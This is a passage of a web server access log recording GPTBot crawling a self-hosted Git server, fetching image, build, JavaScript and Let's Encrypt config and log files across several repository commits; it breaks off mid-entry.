"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699420] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429967] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641804] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" -[17/Feb/2026:14:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641823] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10876] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" -[17/Feb/2026:14:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10874] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" -[17/Feb/2026:14:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/weekly" [Client 74.7.227.38] [Length 8598] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:14:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" -[17/Feb/2026:14:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692382] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498866] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498863] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9887] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:14:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:14:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 36893] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" -[17/Feb/2026:14:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11682] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" -[17/Feb/2026:14:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9498] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:14:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" -[17/Feb/2026:14:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11702] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" -[17/Feb/2026:14:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39565] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:14:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27244] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:14:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" -[17/Feb/2026:14:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42200] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:14:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51492] [Gzip 13.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:14:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44635] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:14:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11710] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" -[17/Feb/2026:14:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:14:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:14:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:14:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9937] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:14:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:14:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:14:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:14:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:14:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42031] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:14:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" [Client 74.7.227.38] [Length 10499] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:14:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:14:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:14:17:21 +0000] - 200 200 